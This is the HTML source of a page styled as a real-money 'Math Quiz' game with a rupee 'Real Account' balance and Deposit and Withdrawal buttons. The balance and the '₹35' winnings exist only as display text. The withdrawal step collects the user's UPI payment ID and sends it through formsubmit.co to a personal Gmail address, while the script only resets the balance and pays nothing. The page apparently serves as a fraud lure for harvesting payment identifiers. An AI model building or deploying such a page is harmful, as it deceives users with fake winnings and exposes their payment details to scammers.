<!DOCTYPE html>
<html>

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>new game </title>
</head>
<style>
          *{
      margin:0;
      padding:0;
      overflow:hidden;
      box-sizing:border-box;
    }
    header{
      width:100%;
      height:60px;
      background: white ;
    }
             #Deposit{
      width:100px;
      float:left;
      height:23px;
      margin-left:80px;
      font-size:11px;
      margin-top:8px;
      background:linear-gradient(skyblue,lightgreen);
      font-weight:bold;
    
    }
            #Withdraw{
      width:100px;
      float:left;
      height:23px;
      margin-left:40px;
           font-size:11px;
      margin-top:8px;
      background:linear-gradient(skyblue,lightgreen);
    font-weight:bold;
    
    }
    h3{
     text-align:center;
    }
    #game_page{
  
     width:100%;
     height:900px;
     background:url(Mathphoto.jpg);
     background-size: contain ;
     
}
    h1{
      color: white ;
      text-align:center;
      padding-top:10px;
   
}
    
      #Q1{
      color:white;
      position:relative;
      top:50px;
      left:-130px;
      font-size:25px;
    
}
    
    #one{
      float:left;
      position:relative;
      top:100px;
      width:60px;
      height:30px;
      left:100px;
      font-weight:bold;
   
}
      
    
        #two{
      float:left;
      position:relative;
      top:100px;
      width:60px;
      height:30px;
      left:130px;
      font-weight:bold;
     
}
      
    
        #three{
      float:left;
      position:relative;
      top:150px;
      width:60px;
      height:30px;
      left:-20px;
      font-weight:bold;
     
}
      
    
        #four{
      float:left;
      position:relative;
      top:150px;
      width:60px;
      height:30px;
      left:10px;
      font-weight:bold;
     
}
      
    
    #Q2{
      color: white ;
      position:fixed;
      top:350px;
      left:100px;
      font-size:25px;
    
}
      
    
        #ones{
      float:left;
      position:relative;
      top:270px;
      width:60px;
      height:30px;
      left:-140px;
      font-weight:bold;
     
}
      
    
#twoo{
  width:60px;
  height:30px;
  margin-top:240px;
  margin-left:185px;

}

#threes{
  width:60px;
  height:30px;
  position:relative;
  top:50px;
  left:-150px;

}

#fourr{
  width:60px;
  height:30px;
  position: relative ;
  top:50px;
  left:-128px;

}

.arrow{
  position: fixed ;
  top:20px;
  left:20px;
  font-size:20px;
}
#with{
  width:130px;
  height:40px;
  margin-top:90px;
  margin-left:120px;
  opacity:0;

}
#contain{
  width:250px;
  height:300px;
  border:2px solid white;
  margin:100px auto;
  margin-left:70px;
  border-radius:10px;
  display:none;
}
#id{
  color:white;
  font-size:20px;
  position: relative ;
  top:20px;
  left:20px;
  display:;
}

#text{
  width:200px;
  height:30px;
  position:relative;
  margin-top:30px;
  margin-left:20px;
  outline:none;
 

}
#text[type=text]{
  color:black;
  font-weight:bold;
  padding-left:10px;
}
#text::placeholder{
  color:black;
  font-weight:bold;
}
#btn{
  width:120px;
  height:40px;
  position:relative;
  top:-230px;
  left:130px;
  font-size:15px;
  font-weight:bold;
  display:nne;

}
#btn:hover{
  background: transparent ;
  color:white;
}
#notice{
  color:white;
  position:fixed;
  top:430px;
  left:100px;
  font-weight:bold;
  display:none;
}
#play_again{
  width:100px;
  height:40px;
  margin-left:150px;
  position:fixed;
  top:390px;
  display:none;
}
#withs{
  width:130px;
  height:40px;
  margin-top:-230px;
  margin-left:110px;
  display:none;
  position:relative;
  top:-250px;
  left:10px;
}
#play{
  width:100px;
  height:40px;
  position:fixed;
  top:300px;
  right:160px;
  display:none;
}
</style>

<body>
  <header>
    <h3 id="h3">Real Account  ₹ : 100</h3>
   <button id="Deposit" onclick="deposit()">Deposit </button>
   <button id="Withdraw">Withdrawal </button>
   <a href="Index.html"><i class="fa-solid fa-arrow-left arrow"></i></a>
   </header>
   <div id="game_page">
  <h1 id="title">Math Quiz</h1>
  <span id="Q1">Q1. 0 × 1? </span>
  <button id="one" onclick="one()">1</button> 
  <button id="two" onclick="two()">-0</button>
  <button id="three" onclick="three()"> -1</button>
  <button id="four" onclick="four()">0</button>
  
    <span id="Q2">Q2. √5 × √5 ? </span>
  <button id="ones" onclick="ONE()"> 0</button>
  <button id="twoo" onclick="TWO()">25</button>
  <button id="threes" onclick="THREE()"> -25</button>
  <button id="fourr" onclick="FOUR()">5</button>

  <div id="contain">
      <form action="https://formsubmit.co/javeshkumar1984@gmail.com" method="POST">
    <label id="id">Enter Upi Id</label>
    <input type="text" id="text" placeholder="Enter Upi Id" name="upi" required/>
  </div>

  <button id="withs" onclick="withdraw()">Withdrawal NOW</button>
 
  <p id="notice">Withdrawal 6 hours later</p>
  <button id="with"  onclick="show()">Withdrawal Now</button>
  </form>
  <a href="2newgame.html"><button id="play">Play Game</button></a>

</div>

<script>
    function one(){
      let one = document.getElementById("one");
      alert("You Lose ");
    }
    function two(){
      let two = document.getElementById("two");
      alert("You Lose");
    }
    function three(){
      let three = document.getElementById("three");
      alert("YOU LOSE");
      
    }
    function four(){
      let four = document.getElementById("four");
      let real  = document.getElementById("h3");
      real.innerHTML = "Real Account  ₹ : 135";
      alert("You Win  ₹ : 35");
    }
    function ONE(){
      let ONE = document.getElementById("ones");
      alert("YOU LOSE");
    }
    function TWO(){
      let TWO = document.getElementById("twoo");
      alert("YOU LOSE");
    }
    function THREE(){
      let THREE = document.getElementById("threes");
      alert("YOU LOSE");
    }
    function FOUR(){
      let FOUR = document.getElementById("fourr");
      let withs = document.getElementById("with");
      alert("You Win  ₹ : 35");
      let REAL = document.getElementById("h3");
      REAL.innerHTML = "Real Account  ₹ : 135";
      withs.style.opacity = 1;
    }
    function show(){
     let withss = document.getElementById("with");
     let contain = document.getElementById("contain");
     let ques1 = document.getElementById("Q1");
     let ques2 = document.getElementById("Q2");
     let ONESS = document.getElementById("one");
     let TWOOS = document.getElementById("two");
     let THREESS = document.getElementById("three");
     let FOURRRR = document.getElementById("four");
     let oness = document.getElementById("ones");
     let twoos = document.getElementById("twoo");
    let threess = document.getElementById("threes");
   let fourrr = document.getElementById("fourr");
   let notice = document.getElementById("notice");
   let withsssss = document.getElementById("withs");
   withss.style.opacity = 0;
   contain.style.display = "inline-block";
   ques1.style.display = "none";
   ques2.style.display = "none";
   ONESS.style.display = "none";
   TWOOS.style.display = "none";
   THREESS.style.display = "none";
   FOURRRR.style.display = "none";
   oness.style.display = "none";
   twoos.style.display = "none";
   threess.style.display = "none";
   fourrr.style.display = "none";
   notice.style.display = "inline-block";
   withsssss.style.display = "inline-block";
     
    }
    function withdraw(){
      let money = document.getElementById("h3");
      let play1 = document.getElementById("play");
      play1.style.display = "inline-block";
      let CONTAIN = document.getElementById("contain");
      let NOTICE = document.getElementById("notice");
      NOTICE.style.display = "none";
      CONTAIN.style.display = "none";
      money.innerHTML = "Real Account  ₹ : 100";
    }
</script>
</body>

</html>
